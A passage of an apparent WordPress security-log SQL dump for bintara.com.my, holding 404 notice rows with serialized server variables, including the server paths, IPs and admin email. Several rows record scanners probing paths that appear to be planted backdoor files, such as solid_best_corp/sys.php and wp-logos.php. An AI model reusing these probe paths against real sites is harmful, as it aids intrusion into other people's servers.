05:14:10',35495024,37308144,'https://bintara.com.my/wp-logos.php',1,0,'193.106.30.99'),(28196,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.144\";s:11:\"REMOTE_PORT\";s:5:\"27610\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaf@876w7EGsr2YLNHROIQAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571290867.3778\";s:12:\"REQUEST_TIME\";s:10:\"1571290867\";}}','notice','2019-10-17 05:41:10','2019-10-17 05:41:07',35021288,36829184,'https://bintara.com.my/?page_id=18',1,0,'46.229.168.144'),(28197,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"F62FB75A-4C7D-4964-80CC-C01530E7FA29\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XagUiOAdYZLFiOaMP2nw4wAAABI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.34.96\";s:11:\"REMOTE_PORT\";s:5:\"59782\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XagUiOAdYZLFiOaMP2nw4wAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571296392.634\";s:12:\"REQUEST_TIME\";s:10:\"1571296392\";}}','notice','2019-10-17 07:13:15','2019-10-17 07:13:12',35768032,37561240,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.34.96'),(28198,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:124:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.66 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:122:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"64633\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XagZ7gSv6QovRW0DK2kwQQAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571297774.6794\";s:12:\"REQUEST_TIME\";s:10:\"1571297774\";}}','notice','2019-10-17 07:36:16','2019-10-17 07:36:15',35022960,36839016,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28199,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.66 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"65080\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XagZ8wSv6QovRW0DK2kwRQAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571297779.8963\";s:12:\"REQUEST_TIME\";s:10:\"1571297779\";}}','notice','2019-10-17 07:36:21','2019-10-17 07:36:20',35028440,36843504,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28200,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:49:\"/demo/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/demo/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:49:\"/demo/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xagf8zaIzmjKT0uBEUqQvAAAABE\";s:19:\"REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/demo/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:49:\"/demo/wp-content/plugins/solid_best_corp/info.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xagf8zaIzmjKT0uBEUqQvAAAABE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"188.213.175.168\";s:11:\"REMOTE_PORT\";s:5:\"59632\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:71:\"https://bintara.com.my/demo/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:49:\"/demo/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xagf8zaIzmjKT0uBEUqQvAAAABE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571299316.0118\";s:12:\"REQUEST_TIME\";s:10:\"1571299316\";}}','notice','2019-10-17 08:01:58','2019-10-17 08:01:56',35664296,37469944,'https://bintara.com.my/demo/wp-content/plugins/solid_best_corp/info.php',1,0,'188.213.175.168'),(28201,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/demo/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/demo/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/demo/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaggGQSv6QovRW0DK2k0hQAAAMk\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/demo/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/demo/wp-content/plugins/solid_best_corp/sys.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaggGQSv6QovRW0DK2k0hQAAAMk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"188.213.175.168\";s:11:\"REMOTE_PORT\";s:5:\"34829\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/demo/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:48:\"/demo/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaggGQSv6QovRW0DK2k0hQAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571299353.1355\";s:12:\"REQUEST_TIME\";s:10:\"1571299353\";}}','notice','2019-10-17 08:02:35','2019-10-17 08:02:33',35436456,37240584,'https://bintara.com.my/demo/wp-content/plugins/solid_best_corp/sys.php',1,0,'188.213.175.168'),(28202,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:47:\"/new/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/new/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:47:\"/new/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XagkCgSv6QovRW0DK2k1mQAAANY\";s:19:\"REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/new/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:47:\"/new/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XagkCgSv6QovRW0DK2k1mQAAANY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.143.224\";s:11:\"REMOTE_PORT\";s:5:\"59517\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:69:\"https://bintara.com.my/new/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:47:\"/new/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XagkCgSv6QovRW0DK2k1mQAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571300362.8268\";s:12:\"REQUEST_TIME\";s:10:\"1571300362\";}}','notice','2019-10-17 08:19:27','2019-10-17 08:19:23',35663064,37452728,'https://bintara.com.my/new/wp-content/plugins/solid_best_corp/sys.php',1,0,'5.135.143.224'),(28203,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/new/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/new/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/new/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XagkEASv6QovRW0DK2k1mwAAAMw\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/new/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/new/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XagkEASv6QovRW0DK2k1mwAAAMw\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.143.224\";s:11:\"REMOTE_PORT\";s:5:\"60254\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/new/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:48:\"/new/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XagkEASv6QovRW0DK2k1mwAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571300369.2428\";s:12:\"REQUEST_TIME\";s:10:\"1571300369\";}}','notice','2019-10-17 08:19:32','2019-10-17 08:19:29',35044400,36847336,'https://bintara.com.my/new/wp-content/plugins/solid_best_corp/info.php',1,0,'5.135.143.224'),(28204,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:124:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-balustrades%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, 